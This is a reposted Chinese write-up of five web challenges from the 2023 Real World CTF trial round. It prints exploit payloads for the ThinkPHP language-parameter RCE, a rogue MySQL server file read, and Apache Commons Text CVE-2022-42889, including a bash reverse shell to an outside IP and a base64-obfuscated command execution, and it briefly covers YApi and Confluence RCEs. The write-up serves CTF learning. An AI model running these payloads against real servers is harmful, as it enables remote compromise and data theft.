文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

2023 Real World CTF体验赛部分Writeup

2023-09-12 06:49

关注

web1

在这里插入图片描述
Thinkphp lang多语言 RCE漏洞,直接打

GET /index.php?+config-create+/+/tmp/keep.php HTTP/1.1Host: 47.98.124.175:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,**User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36DNT: 1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Content-Length: 2think-lang:../../../../../../../../tmp/keepCookie: think_lang=zh-cn;Connection: close

在这里插入图片描述
在这里插入图片描述

rwctf{PHP_1s_Th3_B3st_L@ngvag3_1n_the_w0r1d}

web2

是一个MySQL连接框
在这里插入图片描述

利用场景:

  1. 利用重装漏洞,读取目标服务器上的任意文件
  2. 利用目标的数据迁移等,能连接外部数据库的功能点,读取目标服务器上的任意文件
  3. 搭建在蜜罐上读取攻击者的信息,蓝队溯源/反制
    攻击流程:
  4. 受害者向攻击者提供的服务器发起请求,并尝试进行身份认证
  5. 攻击者的MySQL接受到受害者的连接请求,攻击者发送正常的问候、身份验证正确,并且向受害者的MySQL客户端请求文件。
  6. 受害者的MySQL客户端认为身份验证正确,执行攻击者的发来的请求,通过LOAD DATA INLINE 功能将文件内容发送回攻击者的MySQL服务器。
  7. 攻击者收到受害者服务器上的信息,读取文件成功,攻击完成。
    使用项目:https://github.com/rmb122/rogue_mysql_server
    修改项目配置文件,修改读取内容为/flag:
    在这里插入图片描述

监听Mysql服务:
在这里插入图片描述

提交所监听的地址和端口,以及用户信息
在这里插入图片描述

在这里插入图片描述
获取读取flag文件结果
在这里插入图片描述
rwctf{d041bd251adb4380b3e1dea2bd355f8f}

Web3

在这里插入图片描述

CVE-2022-42889,apache common textshell
尝试进行利用,发现过滤了常用的file script url dns
在这里插入图片描述

可以通过base64Decoder绕过
在这里插入图片描述
在这里插入图片描述

尝试通过base64编码绕过后,进行反弹shell

${script:javascript:java.lang.Runtime.getRuntime().exec("bash -c 'exec bash -i &>/dev/tcp/111.111.111.111/54321 <&1'")}

但是并没有成功,后面通过构造输入输出流去读取执行./readflag,得出flag

${script:javascript:new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("./readflag").getInputStream())).readLine()}

在这里插入图片描述

${base64Decoder:JHtzY3JpcHQ6amF2YXNjcmlwdDpuZXcgamF2YS5pby5CdWZmZXJlZFJlYWRlcihuZXcgamF2YS5pby5JbnB1dFN0cmVhbVJlYWRlcihqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiLi9yZWFkZmxhZyIpLmdldElucHV0U3RyZWFtKCkpKS5yZWFkTGluZSgpfQ==}

在这里插入图片描述

rwctf{rwctf_1terat1on_1s_4_g0od_des1gN_e5aa}

Web4

在这里插入图片描述

YApi 接口管理平台 up SQL注入漏洞,尝试通过NoSQL注入直接RCE
在这里插入图片描述
获取权限,尝试获取flag
在这里插入图片描述
在这里插入图片描述
rwctf{y0u_h4ve_f0und_yvmmy_@pi_f0r_c1ph3r_ch4ll3ng3s}

Web5

在这里插入图片描述
CVE-2022-26134 Atlassian Confluence远程代码执行漏洞,之前复现过,直接通过之前写的脚本getshell
在这里插入图片描述

rwctf{154fea37c0f14b519942931db23e89e8}

来源地址:https://blog.csdn.net/qq_36618918/article/details/128595268

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯